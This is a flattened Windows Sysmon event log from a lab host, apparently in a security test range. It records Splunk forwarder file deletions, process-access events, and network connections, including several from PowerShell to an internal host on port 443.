23542300x800000000000000035084459Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:50.374{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E0CF55801E4BCE08660D919B8E7B636,SHA256=E1AF739ABBE69FEC580EBF08FB43559C9FB90D6CEB892DEB283CE13E7BC2974D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084461Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:51.426{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0C244D0AF70123E5531F36F421AB077,SHA256=3610BA69A60F80E94A9EB00D1CF0EE80910531EE7E401373B24A51935490B7CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084460Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:51.027{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=ADDF3EF308138F4EC670575EC2938696,SHA256=F13DD28D977A9430BF19715F906D5BE7E7D496CD2387B17387C2C5B98C077C3E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084464Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:16.145{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56608-false10.0.1.12-8000- 23542300x800000000000000035084463Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:52.427{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3093149DB1BFEEB755B494FB9597723A,SHA256=A85A40CE38F5CBBD848034D01C72A376B4247F8A2C0C208FCB67617BB7C0A232,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084462Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:15.977{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56607-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084465Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:53.442{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C08C8E04A3BC63B04359C80819B8120,SHA256=17D305D00E24FECA8BC40D4333289C2A5B0AB25F0D200EBC7E283103138A58BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084467Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:54.841{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084466Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:54.457{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA94FACD01A85D6D692B211DA794BFAD,SHA256=3B0BCF575B61CF2BB17623353CCCBB9736523FE4571B2B1785232A4A507BA13E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084470Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:55.492{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=888EBE706439AEACF723613100BD57F9,SHA256=38E767213C86628860A37D7CFC705E4AC407269265883028FE966E9EEFFD8EBA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084469Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:19.992{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56609-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084468Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:55.072{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3AEA829B1AE3D7E9D631A4DE9BF8364A,SHA256=B0763F8AB062CEC53F9A30B78B1A4FDD7BE171A12D7804A8A119707AC826A17A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084472Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:56.510{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC1808C37F589D035628D91979A4555B,SHA256=8042E934B83750557557B4E886AEE6BCAA1496CB081677B4273AC99349560952,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084471Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:20.844{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56610-false10.0.1.12-8089- 23542300x800000000000000035084474Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:57.540{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18AE7CBF456D601BA8899F46676EDA22,SHA256=FE07668234DAD1467281BB96761F1CD7292769C6E68C4752149BA438878D07E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084473Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:22.144{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56611-false10.0.1.12-8000- 23542300x800000000000000035084475Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:58.555{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33C75AB6FFC792FF6A8E473A3EA32429,SHA256=358CC3D0D6E5C7B69E5FEDB5D89CAE947E316A92E3208F311D98868765AE291E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084476Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:59.569{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBC0B9BCD394D9B3C7093345DC47EEE1,SHA256=246747781CFD5793843F084FD4F00ED491077BB69C1692FE59EB107C1069C303,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084477Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:00.586{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C1563FF04C072445A198292AEF9E859,SHA256=BEC80BBEA7845924C926D91578C77FEF09022D127F0BF766F85E61452B48DA69,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084480Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:01.620{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=912983F88AF5E5D9D56590FBCF11B610,SHA256=EDE7ADD914AFE62B993303FF66F07F8F4A81D7CC27FEA0B5C7D9B7FC4A9D97B1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084479Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:26.004{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56612-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084478Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:01.021{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F434CCDB2FD59AF574F4FCE12DA37575,SHA256=5BD3EB6E7B65784F061A076E780F933CE348C51938CBFA460C068EF96ECC8B08,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084482Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:27.155{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56613-false10.0.1.12-8000- 23542300x800000000000000035084481Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:02.635{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80C1CD414829D58A17FE487987315F05,SHA256=BCCFE243602BC0FAC5F778F59CE314C467976492109EADE5CD127B4EE2931199,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084483Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:03.683{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AE9906A6DD60BEC186DDE1AC76CED48,SHA256=DCE00D2883B08CF626A0DA03732EFB7E3FE37910A4CF0892AC0C313BEDBDBD01,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084484Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:04.689{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAAA65218B640B8DCC2C6F0B3EF7EB33,SHA256=085DB88F91981B19C4B259E8139A3E9142ABEAB4BAF08B552A63CD683DBECEC6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084486Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:05.937{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3B0DE999E2C0147C16E2860CFA89D8D,SHA256=837A089D2CD63061A5BFF0F3CD731733D049AEF73C21656F9FB3FBC1D681F3B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084485Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:05.088{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=85D4F40B3C43E78D2C204F500FB389DD,SHA256=A47C8050F76B522A79BAB19B23994EA075FEB98AB9C6607505740EBCD57AE1AD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084488Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:06.951{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C972059EBBE27A8DD708C8D24B5F842C,SHA256=5281F71BB4AD5B74B700085F603909B74FAC4A33A2227654FCDDBD884E450C04,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084487Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:30.022{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56614-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084489Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:07.982{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1F8717FF499F2B32DAA87459BD25BA9,SHA256=C3EBF2A96AA11F177388D817E02FAEE829E449B73823B595C67F9B88E6934288,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084490Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:33.085{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56615-false10.0.1.12-8000- 354300x800000000000000035084493Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:34.038{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56616-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084492Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:09.183{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D9DE983D2276EB562786452B006846FB,SHA256=40788B94A2F703153A9A48286BCA6788F61F458194639A053EE64982B473F575,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084491Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:09.033{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09A62041DEF423FEE5F88F84D414459A,SHA256=D4CB02177F70026CF1BCA8362CD34135C8C17FA172823C35BA6E8B10697A89CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084494Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:10.047{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CB231DF60AD90113B0EF869C7463B16,SHA256=641BEC56664AFDDC55F467505C0D2DA16DEB961ACE996F3C9D428F4214CE6689,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084495Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:11.080{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A74CE37FD796BAC9A5060621E2140320,SHA256=B73A7B6A6B410EBE0B7772D8F0E6D6A4448D2E0B6581FD804BD9861C16943DA0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084496Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:12.098{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A584FED935785975C91D84EB93FD8F79,SHA256=7C3FA5F119406B481958562D2CB4F86BE6FC0D0ACB48BC18FD76FA104223B2C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084506Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:13.581{B81B27B7-4E41-613A-3C90-03000000C801}39484580C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084505Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:13.428{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E41-613A-3C90-03000000C801}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084504Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:13.428{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084503Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:13.428{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084502Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:13.428{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084501Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:13.428{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084500Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:13.428{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4E41-613A-3C90-03000000C801}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084499Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:13.428{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E41-613A-3C90-03000000C801}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084498Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:13.413{B81B27B7-4E41-613A-3C90-03000000C801}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 